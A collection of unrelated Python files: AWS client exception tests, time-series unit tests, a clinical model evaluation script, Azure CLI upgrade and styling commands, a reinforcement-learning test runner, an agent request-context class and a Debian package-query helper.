# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from contextlib import contextmanager
from tests import unittest, BaseSessionTest, ClientHTTPStubber
class TestModeledExceptions(BaseSessionTest):
def setUp(self):
super(TestModeledExceptions, self).setUp()
self.region = "us-east-1"
def _create_client(self, service):
client = self.session.create_client(service, self.region)
http_stubber = ClientHTTPStubber(client)
return client, http_stubber
def test_query_service(self):
body = (
b'<ErrorResponse xmlns="http://ses.amazonaws.com/doc/2010-12-01/">'
b'<Error><Type>Sender</Type>'
b'<Name>foobar</Name>'
b'<Code>AlreadyExists</Code>'
b'<Message>Template already exists</Message>'
b'</Error></ErrorResponse>'
)
response = {
'Error': {
# NOTE: The name and type are also present here as we return
# the entire Error node as the 'Error' field for query
'Name': 'foobar',
'Type': 'Sender',
'Code': 'AlreadyExists',
'Message': 'Template already exists',
},
'ResponseMetadata': {
'HTTPStatusCode': 400,
'HTTPHeaders': {},
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'Name': 'foobar',
}
ses, http_stubber = self._create_client('ses')
exception_cls = ses.exceptions.AlreadyExistsException
with http_stubber as stubber:
stubber.add_response(status=400, headers={}, body=body)
with self.assertRaises(exception_cls) as assertion_context:
template = {
'TemplateName': 'foobar',
'SubjectPart': 'foo',
'TextPart': 'bar'
}
ses.create_template(Template=template)
self.assertEqual(assertion_context.exception.response, response)
def test_rest_xml_service(self):
body = (
b'<?xml version="1.0"?>\n'
b'<ErrorResponse xmlns="http://cloudfront.amazonaws.com/doc/2019-03-26/">'
b'<Error><Type>Sender</Type><Code>NoSuchDistribution</Code>'
b'<Message>The specified distribution does not exist.</Message>'
b'</Error>'
b'<RequestId>request-id</RequestId>'
b'</ErrorResponse>'
)
response = {
'Error': {
'Type': 'Sender',
'Code': 'NoSuchDistribution',
'Message': 'The specified distribution does not exist.',
},
'ResponseMetadata': {
'HTTPStatusCode': 404,
'HTTPHeaders': {},
'RequestId': 'request-id',
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'Message': 'The specified distribution does not exist.',
}
cloudfront, http_stubber = self._create_client('cloudfront')
exception_cls = cloudfront.exceptions.NoSuchDistribution
with http_stubber as stubber:
stubber.add_response(status=404, headers={}, body=body)
with self.assertRaises(exception_cls) as assertion_context:
cloudfront.get_distribution(Id='foobar')
self.assertEqual(assertion_context.exception.response, response)
def test_rest_json_service(self):
headers = {
'x-amzn-RequestId': 'request-id',
'x-amzn-ErrorType': 'FileSystemAlreadyExists:',
}
body = (
b'{"ErrorCode":"FileSystemAlreadyExists",'
b'"FileSystemId":"fs-abcabc12",'
b'"Message":"File system already exists"}'
)
response = {
'Error': {
'Code': 'FileSystemAlreadyExists',
'Message': 'File system already exists',
},
'ResponseMetadata': {
'HTTPStatusCode': 409,
'HTTPHeaders': {
'x-amzn-requestid': 'request-id',
'x-amzn-errortype': 'FileSystemAlreadyExists:',
},
'RequestId': 'request-id',
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'ErrorCode': 'FileSystemAlreadyExists',
'FileSystemId': 'fs-abcabc12',
'Message': 'File system already exists',
}
efs, http_stubber = self._create_client('efs')
exception_cls = efs.exceptions.FileSystemAlreadyExists
with http_stubber as stubber:
stubber.add_response(status=409, headers=headers, body=body)
with self.assertRaises(exception_cls) as assertion_context:
efs.create_file_system()
self.assertEqual(assertion_context.exception.response, response)
def test_json_service(self):
headers = {
'x-amzn-RequestId': 'request-id',
'x-amzn-id-2': 'id-2',
}
body = (
b'{"__type":"ResourceNotFoundException",'
b'"message":"Stream not found"}'
)
response = {
'Error': {
'Code': 'ResourceNotFoundException',
'Message': 'Stream not found',
},
'ResponseMetadata': {
'HTTPStatusCode': 400,
'HTTPHeaders': {
'x-amzn-requestid': 'request-id',
'x-amzn-id-2': 'id-2',
},
'RequestId': 'request-id',
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'message': 'Stream not found',
}
kinesis, http_stubber = self._create_client('kinesis')
exception_cls = kinesis.exceptions.ResourceNotFoundException
with http_stubber as stubber:
stubber.add_response(status=400, headers=headers, body=body)
with self.assertRaises(exception_cls) as assertion_context:
kinesis.describe_stream(StreamName='foobar')
self.assertEqual(assertion_context.exception.response, response)
|
import unittest
from timeseries.timeseries import TimeSeries
import numpy as np
class MyTest(unittest.TestCase):
def test_median(self):
self.assertEqual(TimeSeries([1,2,3],[2,2,2]).median(),2)
self.assertEqual(TimeSeries([1,2,3],[0,2,0]).median(),0)
self.assertEqual(TimeSeries([1,2,3,4],[0,2,2,0]).median(),1)
with self.assertRaises(ValueError):
TimeSeries([],[]).median()
def test_mean(self):
self.assertEqual(TimeSeries([1,2,3],[2,2,2]).mean(),2)
self.assertEqual(TimeSeries([1,2,3],[0,2,0]).mean(),2/3)
self.assertEqual(TimeSeries([1,2,3,4],[0,2,2,0]).mean(),1)
with self.assertRaises(ValueError):
TimeSeries([],[]).mean()
def test_iters(self):
ts = TimeSeries([1,2,3],[4,5,6])
times = ts.times()
count = 0
for item in ts:
self.assertEqual(item, ts[times[count]])
count += 1
self.assertEqual(count, len(ts))
count = 0
for item in ts.itervalues():
self.assertEqual(item, ts[times[count]])
count += 1
self.assertEqual(count, len(ts))
count = 0
for item in ts.itertimes():
self.assertEqual(item, times[count])
count += 1
self.assertEqual(count, len(ts))
count = 0
for item in ts.iteritems():
self.assertEqual(item, (times[count], ts[times[count]]))
count += 1
self.assertEqual(count, len(ts))
def test_pos(self):
self.assertListEqual( list(TimeSeries([1,2,3],[-1,2,-4]).__pos__()) , [-1,2,-4] )
self.assertListEqual( list(TimeSeries([1,2,3],[1,2,4]).__pos__() ), [1,2,4] )
self.assertListEqual( list(TimeSeries([1,2,3],[-4,-6,-7]).__pos__() ), [-4,-6,-7] )
with self.assertRaises(ValueError):
TimeSeries([],[]).__pos__()
def test_neg(self):
self.assertListEqual( list( TimeSeries([1,2,3],[-1,2,-4]).__neg__() ), [1,-2,4] )
self.assertListEqual( list( TimeSeries([1,2,3],[1,2,4]).__neg__() ), [-1,-2,-4] )
self.assertListEqual( list( TimeSeries([1,2,3],[-4,-6,-7]).__neg__() ), [4,6,7] )
with self.assertRaises(ValueError):
TimeSeries([],[]).__neg__()
# def test_abs(self):
# self.assertEqual( TimeSeries([1,2,3],[-1,2,-4]).__abs__, [1,2,4] )
# self.assertEqual( TimeSeries([1,2,3],[1,2,4]).__abs__, [1,2,4] )
# self.assertEqual( TimeSeries([1,2,3],[-4,-6,-7]).__abs__, [4,6,7] )
# with self.assertRaises(ValueError):
# TimeSeries([],[]).__abs__
# def test_bool(self):
# self.assertEqual( TimeSeries([1,2,3],[-1,2,-4]).__neg__, True )
# self.assertEqual( TimeSeries([1,2,3],[1,2,4]).__neg__, True )
# self.assertEqual( TimeSeries([1,2,3],[-4,-6,-7]).__neg__, True )
suite = unittest.TestLoader().loadTestsFromModule(MyTest())
unittest.TextTestRunner().run(suite)
|
# this is a file full with problems
# but ignored with:
# checker_ignore_this_file
import os
def doit():
foo = bar
def with_tab():
print "there's a tab"
|
import numpy as np
import pandas as pd
import pickle
import sys
import tensorflow as tf
import random
import math
import os
import statistics
import time
from sklearn.metrics import confusion_matrix, f1_score, precision_score, recall_score, roc_auc_score, brier_score_loss, auc, precision_recall_curve, roc_curve
from sklearn.isotonic import IsotonicRegression
from sklearn.linear_model import LogisticRegression
from sklearn.calibration import calibration_curve
import matplotlib.pyplot as plt
# ------------------------------------------------------ loading libraries ----
#opt = 'sites'
opt = 'years'
# --- setting random seed -----------------------------------------------------
seed_n = 42
np.random.seed(seed_n)
random.seed(seed_n)
tf.random.set_seed(seed_n)
# loading model
model = tf.keras.models.load_model('/project/M-ABeICU176709/delirium/data/revision/outputs/models/model_'+opt+'.hdf5')
# loading data
X_adm = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/X_adm5y_test_'+opt+'.pickle', 'rb'))
X_temp = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/X_temp_test_'+opt+'.pickle', 'rb'))
y_12h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/y_12h_test_'+opt+'.pickle', 'rb'))
y_24h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/y_24h_test_'+opt+'.pickle', 'rb'))
# -----------------------------------------------------------------------------
P_12h = y_12h.sum()
N_12h = len(y_12h) - P_12h
P_24h = y_24h.sum()
N_24h = len(y_24h) - P_24h
# Predicting y_12h and y_24h
results = model.predict([X_adm, X_temp],
verbose = 1)
y_12h_pred = results[0]
y_24h_pred = results[1]
# Applying calibrators (isotonic regression)
# Applying isotonic regression
# 12h
y_12h_pred = [x[0] for x in y_12h_pred]
ir_12h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/calibration/calibrators/ir_12h_'+opt+'.pickle', 'rb'))
y_12h_pred = ir_12h.transform(y_12h_pred)
# 24h
y_24h_pred = [x[0] for x in y_24h_pred]
ir_24h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/calibration/calibrators/ir_24h_'+opt+'.pickle', 'rb'))
y_24h_pred = ir_24h.transform(y_24h_pred)
fpr_12h, tpr_12h, thresholds_roc_12h = roc_curve(y_12h, y_12h_pred)
fpr_24h, tpr_24h, thresholds_roc_24h = roc_curve(y_24h, y_24h_pred)
precision_12h, recall_12h, thresholds_pr_12h = precision_recall_curve(y_12h, y_12h_pred)
precision_24h, recall_24h, thresholds_pr_24h = precision_recall_curve(y_24h, y_24h_pred)
# roc 12h
plt.figure()
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_12h, tpr_12h)
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/roc_12h_{opt}.png', dpi = 300)
# roc 24h
plt.figure()
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_24h, tpr_24h)
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/roc_24h_{opt}.png', dpi = 300)
# prc 12h
plt.figure()
plt.plot(precision_12h, recall_12h)
plt.xlabel('Precision')
plt.ylabel('Recall / Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/prc_12h_{opt}.png', dpi = 300)
# prc 24h
plt.figure()
plt.plot(precision_24h, recall_24h)
plt.xlabel('Precision')
plt.ylabel('Recall / Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/prc_24h_{opt}.png', dpi = 300)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
from knack.log import get_logger
from knack.util import CLIError
logger = get_logger(__name__)
UPGRADE_MSG = 'Not able to upgrade automatically. Instructions can be found at https://aka.ms/doc/InstallAzureCli'
def rest_call(cmd, url, method=None, headers=None, uri_parameters=None,
body=None, skip_authorization_header=False, resource=None, output_file=None):
from azure.cli.core.util import send_raw_request
r = send_raw_request(cmd.cli_ctx, method, url, headers, uri_parameters, body,
skip_authorization_header, resource, output_file)
if not output_file and r.content:
try:
return r.json()
except ValueError:
logger.warning('Not a json response, outputting to stdout. For binary data '
'suggest use "--output-file" to write to a file')
print(r.text)
return None
def show_version(cmd): # pylint: disable=unused-argument
from azure.cli.core.util import get_az_version_json
versions = get_az_version_json()
return versions
def upgrade_version(cmd, update_all=None, yes=None): # pylint: disable=too-many-locals, too-many-statements, too-many-branches, no-member, unused-argument
import platform
import sys
import subprocess
import azure.cli.core.telemetry as telemetry
from azure.cli.core import __version__ as local_version
from azure.cli.core._environment import _ENV_AZ_INSTALLER
from azure.cli.core.extension import get_extensions, WheelExtension
from packaging.version import parse
update_cli = True
from azure.cli.core.util import get_latest_from_github
try:
latest_version = get_latest_from_github()
if latest_version and parse(latest_version) <= parse(local_version):
logger.warning("You already have the latest azure-cli version: %s", local_version)
update_cli = False
if not update_all:
return
except Exception as ex: # pylint: disable=broad-except
logger.debug("Failed to get the latest version. %s", str(ex))
exts = [ext.name for ext in get_extensions(ext_type=WheelExtension)] if update_all else []
exit_code = 0
installer = os.getenv(_ENV_AZ_INSTALLER) or ''
installer = installer.upper()
if update_cli:
latest_version_msg = 'It will be updated to {}.'.format(latest_version) if yes \
else 'Latest version available is {}.'.format(latest_version)
logger.warning("Your current Azure CLI version is %s. %s", local_version, latest_version_msg)
from knack.prompting import prompt_y_n, NoTTYException
if not yes:
logger.warning("Please check the release notes first: https://docs.microsoft.com/"
"cli/azure/release-notes-azure-cli")
try:
confirmation = prompt_y_n("Do you want to continue?", default='y')
except NoTTYException:
from azure.cli.core.azclierror import UnclassifiedUserFault
raise UnclassifiedUserFault("No tty available.", "Please run command with --yes.")
if not confirmation:
telemetry.set_success("Upgrade stopped by user")
return
if installer == 'DEB':
from azure.cli.core.util import in_cloud_console
if in_cloud_console():
raise CLIError("az upgrade is not supported in Cloud Shell.")
apt_update_cmd = 'apt-get update'.split()
az_update_cmd = 'apt-get install --only-upgrade -y azure-cli'.split()
if os.geteuid() != 0: # pylint: disable=no-member
apt_update_cmd.insert(0, 'sudo')
az_update_cmd.insert(0, 'sudo')
exit_code = subprocess.call(apt_update_cmd)
if exit_code == 0:
logger.debug("Update azure cli with '%s'", " ".join(az_update_cmd))
exit_code = subprocess.call(az_update_cmd)
elif installer == 'RPM':
from azure.cli.core.util import get_linux_distro
distname, _ = get_linux_distro()
if not distname:
logger.warning(UPGRADE_MSG)
else:
distname = distname.lower().strip()
if any(x in distname for x in ['centos', 'rhel', 'red hat', 'fedora']):
update_cmd = 'yum update -y azure-cli'.split()
if os.geteuid() != 0: # pylint: disable=no-member
update_cmd.insert(0, 'sudo')
logger.debug("Update azure cli with '%s'", " ".join(update_cmd))
exit_code = subprocess.call(update_cmd)
elif any(x in distname for x in ['opensuse', 'suse', 'sles']):
zypper_refresh_cmd = ['zypper', 'refresh']
az_update_cmd = 'zypper update -y azure-cli'.split()
if os.geteuid() != 0: # pylint: disable=no-member
zypper_refresh_cmd.insert(0, 'sudo')
az_update_cmd.insert(0, 'sudo')
exit_code = subprocess.call(zypper_refresh_cmd)
if exit_code == 0:
logger.debug("Update azure cli with '%s'", " ".join(az_update_cmd))
exit_code = subprocess.call(az_update_cmd)
else:
logger.warning(UPGRADE_MSG)
elif installer == 'HOMEBREW':
logger.debug("Update homebrew formulae")
exit_code = subprocess.call(['brew', 'update'])
if exit_code == 0:
update_cmd = ['brew', 'upgrade', 'azure-cli']
logger.debug("Update azure cli with '%s'", " ".join(update_cmd))
exit_code = subprocess.call(update_cmd)
elif installer == 'PIP':
pip_args = [sys.executable, '-m', 'pip', 'install', '--upgrade', 'azure-cli', '-vv',
'--disable-pip-version-check', '--no-cache-dir']
logger.debug("Update azure cli with '%s'", " ".join(pip_args))
exit_code = subprocess.call(pip_args, shell=platform.system() == 'Windows')
elif installer == 'DOCKER':
logger.warning("Exit the container to pull latest image with 'docker pull mcr.microsoft.com/azure-cli' "
"or run 'pip install --upgrade azure-cli' in this container")
elif installer == 'MSI':
exit_code = _upgrade_on_windows()
else:
logger.warning(UPGRADE_MSG)
if exit_code:
err_msg = "CLI upgrade failed."
logger.warning(err_msg)
telemetry.set_failure(err_msg)
sys.exit(exit_code)
# Avoid using python modules directly as they may have been changed due to upgrade.
# If you do need to use them, you may need to reload them and their dependent modules.
# Otherwise you may have such issue https://github.com/Azure/azure-cli/issues/16952
import importlib
import json
importlib.reload(subprocess)
importlib.reload(json)
version_result = subprocess.check_output(['az', 'version', '-o', 'json'], shell=platform.system() == 'Windows')
version_json = json.loads(version_result)
new_version = version_json['azure-cli-core']
if update_cli and new_version == local_version:
err_msg = "CLI upgrade failed or aborted."
logger.warning(err_msg)
telemetry.set_failure(err_msg)
sys.exit(1)
if exts:
logger.warning("Upgrading extensions")
for ext_name in exts:
try:
logger.warning("Checking update for %s", ext_name)
subprocess.call(['az', 'extension', 'update', '-n', ext_name],
shell=platform.system() == 'Windows')
except Exception as ex: # pylint: disable=broad-except
msg = "Extension {} update failed during az upgrade. {}".format(ext_name, str(ex))
raise CLIError(msg)
auto_upgrade_msg = "You can enable auto-upgrade with 'az config set auto-upgrade.enable=yes'. " \
"More details in https://docs.microsoft.com/cli/azure/update-azure-cli#automatic-update"
logger.warning("Upgrade finished.%s", "" if cmd.cli_ctx.config.getboolean('auto-upgrade', 'enable', False)
else auto_upgrade_msg)
def _upgrade_on_windows():
"""Download MSI to a temp folder and install it with msiexec.exe.
Directly installing from URL may be blocked by policy: https://github.com/Azure/azure-cli/issues/19171
This also gives the user a chance to manually install the MSI in case of msiexec.exe failure.
"""
logger.warning("Updating Azure CLI with MSI from https://aka.ms/installazurecliwindows")
tmp_dir, msi_path = _download_from_url('https://aka.ms/installazurecliwindows')
logger.warning("Installing MSI")
import subprocess
exit_code = subprocess.call(['msiexec.exe', '/i', msi_path])
if exit_code:
logger.warning("Installation Failed. You may manually install %s", msi_path)
else:
from azure.cli.core.util import rmtree_with_retry
logger.warning("Succeeded. Deleting %s", tmp_dir)
rmtree_with_retry(tmp_dir)
return exit_code
def _download_from_url(url):
import requests
from azure.cli.core.util import should_disable_connection_verify
r = requests.get(url, stream=True, verify=(not should_disable_connection_verify()))
if r.status_code != 200:
raise CLIError("Request to {} failed with {}".format(url, r.status_code))
# r.url is the real path of the msi, like'https://azcliprod.blob.core.windows.net/msi/azure-cli-2.27.1.msi'
file_name = r.url.rsplit('/')[-1]
import tempfile
tmp_dir = tempfile.mkdtemp()
msi_path = os.path.join(tmp_dir, file_name)
logger.warning("Downloading MSI to %s", msi_path)
with open(msi_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
f.write(chunk)
# Return both the temp directory and MSI path, like
# 'C:\Users\<name>\AppData\Local\Temp\tmpzv4pelsf',
# 'C:\Users\<name>\AppData\Local\Temp\tmpzv4pelsf\azure-cli-2.27.1.msi'
return tmp_dir, msi_path
def demo_style(cmd, theme=None): # pylint: disable=unused-argument
from azure.cli.core.style import Style, print_styled_text, format_styled_text
if theme:
format_styled_text.theme = theme
print_styled_text("[How to call print_styled_text]")
# Print an empty line
print_styled_text()
# Various methods to print
print_styled_text("- Print using a str")
print_styled_text("- Print using multiple", "strs")
print_styled_text((Style.PRIMARY, "- Print using a tuple"))
print_styled_text((Style.PRIMARY, "- Print using multiple"), (Style.IMPORTANT, "tuples"))
print_styled_text([(Style.PRIMARY, "- Print using a "), (Style.IMPORTANT, "list")])
print_styled_text([(Style.PRIMARY, "- Print using multiple")], [(Style.IMPORTANT, "lists")])
print_styled_text()
print_styled_text("[Available styles]\n")
placeholder = '████ {:8s}: {}\n'
styled_text = [
(Style.PRIMARY, placeholder.format("White", "Primary text color")),
(Style.SECONDARY, placeholder.format("Grey", "Secondary text color")),
(Style.IMPORTANT, placeholder.format("Magenta", "Important text color")),
(Style.ACTION, placeholder.format(
"Blue", "Commands, parameters, and system inputs (White in legacy powershell terminal)")),
(Style.HYPERLINK, placeholder.format("Cyan", "Hyperlink")),
(Style.ERROR, placeholder.format("Red", "Error message indicator")),
(Style.SUCCESS, placeholder.format("Green", "Success message indicator")),
(Style.WARNING, placeholder.format("Yellow", "Warning message indicator")),
]
print_styled_text(styled_text)
print_styled_text("[interactive]\n")
# NOTE! Unicode character ⦾ ⦿ will most likely not be displayed correctly
styled_text = [
(Style.ACTION, "?"),
(Style.PRIMARY, " Select a SKU for your app:\n"),
(Style.PRIMARY, "⦾ Free "),
(Style.SECONDARY, "Dev/Test workloads: 1 GB memory, 60 minutes/day compute\n"),
(Style.PRIMARY, "⦾ Basic "),
(Style.SECONDARY, "Dev/Test workloads: 1.75 GB memory, monthly charges apply\n"),
(Style.PRIMARY, "⦾ Standard "),
(Style.SECONDARY, "Production workloads: 1.75 GB memory, monthly charges apply\n"),
(Style.ACTION, "⦿ Premium "),
(Style.SECONDARY, "Production workloads: 3.5 GB memory, monthly charges apply\n"),
]
print_styled_text(styled_text)
print_styled_text("[progress report]\n")
# NOTE! Unicode character ✓ will most likely not be displayed correctly
styled_text = [
(Style.SUCCESS, '(✓) Done: '),
(Style.PRIMARY, "Creating a resource group for myfancyapp\n"),
(Style.SUCCESS, '(✓) Done: '),
(Style.PRIMARY, "Creating an App Service Plan for myfancyappplan on a "),
(Style.IMPORTANT, "premium instance"),
(Style.PRIMARY, " that has a "),
(Style.IMPORTANT, "monthly charge"),
(Style.PRIMARY, "\n"),
(Style.SUCCESS, '(✓) Done: '),
(Style.PRIMARY, "Creating a webapp named myfancyapp\n"),
]
print_styled_text(styled_text)
print_styled_text("[error handing]\n")
styled_text = [
(Style.ERROR, "ERROR: Command not found: az storage create\n"),
(Style.PRIMARY, "TRY\n"),
(Style.ACTION, "az storage account create --name"),
(Style.PRIMARY, " mystorageaccount "),
(Style.ACTION, "--resource-group"),
(Style.PRIMARY, " MyResourceGroup\n"),
(Style.SECONDARY, "Create a storage account. For more detail, see "),
(Style.HYPERLINK, "https://docs.microsoft.com/azure/storage/common/storage-account-create?"
"tabs=azure-cli#create-a-storage-account-1"),
(Style.SECONDARY, "\n"),
]
print_styled_text(styled_text)
print_styled_text("[post-output hint]\n")
styled_text = [
(Style.PRIMARY, "The default subscription is "),
(Style.IMPORTANT, "AzureSDKTest (0b1f6471-1bf0-4dda-aec3-cb9272f09590)"),
(Style.PRIMARY, ". To switch to another subscription, run "),
(Style.ACTION, "az account set --subscription"),
(Style.PRIMARY, " <subscription ID>\n"),
(Style.WARNING, "WARNING: The subscription has been disabled!\n")
]
print_styled_text(styled_text)
print_styled_text("[logs]\n")
# Print logs
logger.debug("This is a debug log entry.")
logger.info("This is a info log entry.")
logger.warning("This is a warning log entry.")
logger.error("This is a error log entry.")
logger.critical("This is a critical log entry.")
|
import argparse
import gym
import torch
from pbrl.algorithms.td3 import TD3, Policy, Runner
from pbrl.env import DummyVecEnv
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--env', type=str, default='HalfCheetah-v3')
parser.add_argument('--filename', type=str, required=True)
parser.add_argument('--subproc', action='store_true')
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--rnn', type=str, default=None)
parser.add_argument('--obs_norm', action='store_true')
parser.add_argument('--env_num_test', type=int, default=1)
parser.add_argument('--episode_num_test', type=int, default=1)
parser.add_argument('--render', type=float, default=0.005)
args = parser.parse_args()
torch.manual_seed(args.seed)
# define test environment
env_test = DummyVecEnv([lambda: gym.make(args.env) for _ in range(args.env_num_test)])
env_test.seed(args.seed)
# define policy
policy = Policy(
observation_space=env_test.observation_space,
action_space=env_test.action_space,
rnn=args.rnn,
hidden_sizes=[256, 256],
activation=torch.nn.ReLU,
obs_norm=args.obs_norm,
critic=False,
device=torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')
)
# load policy from disk
TD3.load(args.filename, policy)
# define test runner
runner_test = Runner(env=env_test, render=args.render)
runner_test.reset()
while True:
try:
test_info = runner_test.run(policy, episode_num=args.episode_num_test)
print(test_info)
except KeyboardInterrupt:
break
if __name__ == '__main__':
main()
|
"""
Request context class.
A request context provides everything required by handlers and other parts
of the system to process a message.
"""
from typing import Mapping, Optional, Type
from ..core.profile import Profile, ProfileSession
from ..config.injector import Injector, InjectType
from ..config.injection_context import InjectionContext
from ..config.settings import Settings
from ..connections.models.conn_record import ConnRecord
from ..transport.inbound.receipt import MessageReceipt
from ..utils.classloader import DeferLoad
from .agent_message import AgentMessage
IN_MEM = DeferLoad("aries_cloudagent.core.in_memory.InMemoryProfile")
class RequestContext:
"""Context established by the Conductor and passed into message handlers."""
def __init__(
self,
profile: Profile,
*,
context: InjectionContext = None,
settings: Mapping[str, object] = None
):
"""Initialize an instance of RequestContext."""
self._connection_ready = False
self._connection_record = None
self._context = (context or profile.context).start_scope("request", settings)
self._message = None
self._message_receipt = None
self._profile = profile
@property
def connection_ready(self) -> bool:
"""
Accessor for the flag indicating an active connection with the sender.
Returns:
True if the connection is active, else False
"""
return self._connection_ready
@connection_ready.setter
def connection_ready(self, active: bool):
"""
Setter for the flag indicating an active connection with the sender.
Args:
active: The new active value
"""
self._connection_ready = active
@property
def connection_record(self) -> ConnRecord:
"""Accessor for the related connection record."""
return self._connection_record
@connection_record.setter
def connection_record(self, record: ConnRecord):
"""Setter for the related connection record.
:param record: ConnRecord:
"""
self._connection_record = record
@property
def default_endpoint(self) -> str:
"""
Accessor for the default agent endpoint (from agent config).
Returns:
The default agent endpoint
"""
return self._context.settings.get("default_endpoint")
@default_endpoint.setter
def default_endpoint(self, endpoint: str):
"""
Setter for the default agent endpoint (from agent config).
Args:
endpoint: The new default endpoint
"""
self._context.settings["default_endpoint"] = endpoint
@property
def default_label(self) -> str:
"""
Accessor for the default agent label (from agent config).
Returns:
The default label
"""
return self._context.settings["default_label"]
@default_label.setter
def default_label(self, label: str):
"""
Setter for the default agent label (from agent config).
Args:
label: The new default label
"""
self._context.settings["default_label"] = label
@property
def message(self) -> AgentMessage:
"""
Accessor for the deserialized message instance.
Returns:
This context's agent message
"""
return self._message
@message.setter
def message(self, msg: AgentMessage):
"""
Setter for the deserialized message instance.
Args:
msg: This context's new agent message
"""
self._message = msg
@property
def message_receipt(self) -> MessageReceipt:
"""
Accessor for the message receipt information.
Returns:
This context's message receipt information
"""
return self._message_receipt
@message_receipt.setter
def message_receipt(self, receipt: MessageReceipt):
"""
Setter for the message receipt information.
Args:
msg: This context's new message receipt information
"""
self._message_receipt = receipt
@property
def injector(self) -> Injector:
"""Accessor for the associated `Injector` instance."""
return self._context.injector
@property
def profile(self) -> Profile:
"""Accessor for the associated `Profile` instance."""
return self._profile
@property
def settings(self) -> Settings:
"""Accessor for the context settings."""
return self._context.settings
def session(self) -> ProfileSession:
"""Start a new interactive session with no transaction support requested."""
return self.profile.session(self._context)
def transaction(self) -> ProfileSession:
"""
Start a new interactive session with commit and rollback support.
If the current backend does not support transactions, then commit
and rollback operations of the session will not have any effect.
"""
return self.profile.transaction(self._context)
def inject(
self,
base_cls: Type[InjectType],
settings: Mapping[str, object] = None,
) -> InjectType:
"""
Get the provided instance of a given class identifier.
Args:
cls: The base class to retrieve an instance of
settings: An optional mapping providing configuration to the provider
Returns:
An instance of the base class, or None
"""
return self._context.inject(base_cls, settings)
def inject_or(
self,
base_cls: Type[InjectType],
settings: Mapping[str, object] = None,
default: Optional[InjectType] = None,
) -> Optional[InjectType]:
"""
Get the provided instance of a given class identifier or default if not found.
Args:
base_cls: The base class to retrieve an instance of
settings: An optional dict providing configuration to the provider
default: default return value if no instance is found
Returns:
An instance of the base class, or None
"""
return self._context.inject_or(base_cls, settings, default)
def update_settings(self, settings: Mapping[str, object]):
"""Update the scope with additional settings."""
self._context.update_settings(settings)
@classmethod
def test_context(cls) -> "RequestContext":
"""Quickly set up a new request context for tests."""
return RequestContext(IN_MEM.resolved.test_profile())
def __repr__(self) -> str:
"""
Provide a human readable representation of this object.
Returns:
A human readable representation of this object
"""
skip = ()
items = (
"{}={}".format(k, repr(v))
for k, v in self.__dict__.items()
if k not in skip
)
return "<{}({})>".format(self.__class__.__name__, ", ".join(items))
|
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import os.path as path
from .native_package_base import native_package_base
from bes.common.string_util import string_util
from bes.common.string_list_util import string_list_util
from bes.system.execute import execute
# FIXME: this is ubuntu only
class native_package_linux(native_package_base):
def __init__(self, blurber = None):
super(native_package_linux, self).__init__(blurber)
@classmethod
def installed_packages(clazz):
'Return a list of installed pacakge.'
cmd = 'dpkg -l'
rv = clazz._call_dpkg(cmd)
if rv.exit_code != 0:
raise RuntimeError('Failed to execute: %s' % (cmd))
lines = rv.stdout.strip().split('\n')
lines = [ l for l in lines if l.startswith('ii') ]
lines = [ string_util.split_by_white_space(l)[1] for l in lines ]
return sorted(lines)
_CONTENTS_BLACKLIST = [
'/.',
]
@classmethod
def package_contents(clazz, package_name):
'Return a list of installed pacakge.'
cmd = 'dpkg-query -L %s' % (package_name)
rv = clazz._call_dpkg(cmd)
if rv.exit_code != 0:
raise RuntimeError('Failed to execute: %s' % (cmd))
contents = rv.stdout.strip().split('\n')
contents = string_list_util.remove_if(contents, clazz._CONTENTS_BLACKLIST)
return sorted(contents)
@classmethod
def package_manifest(clazz, package_name):
'Return a list of installed pacakge.'
contents = clazz.package_contents(package_name)
files = [ f for f in contents if path.isfile(f) ]
return files
@classmethod
def package_dirs(clazz, package_name):
'Return a list of installed pacakge.'
contents = clazz.package_contents(package_name)
files = [ f for f in contents if path.isdir(f) ]
return files
@classmethod
def package_info(clazz, package_name):
'Return platform specific information about a package.'
assert False
@classmethod
def is_installed(clazz, package_name):
'Return True if native_package is installed.'
cmd = 'dpkg -l %s' % (package_name)
rv = clazz._call_dpkg(cmd)
return rv.exit_code == 0
@classmethod
def owner(clazz, filename):
'Return the package that owns filename.'
cmd = 'dpkg -S %s' % (filename)
rv = clazz._call_dpkg(cmd)
if rv.exit_code != 0:
return None
return rv.stdout.split(':')[0].strip()
@classmethod
def _call_dpkg(clazz, cmd):
'Call dpkg.'
return execute.execute(cmd, raise_error = False, shell = True)
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
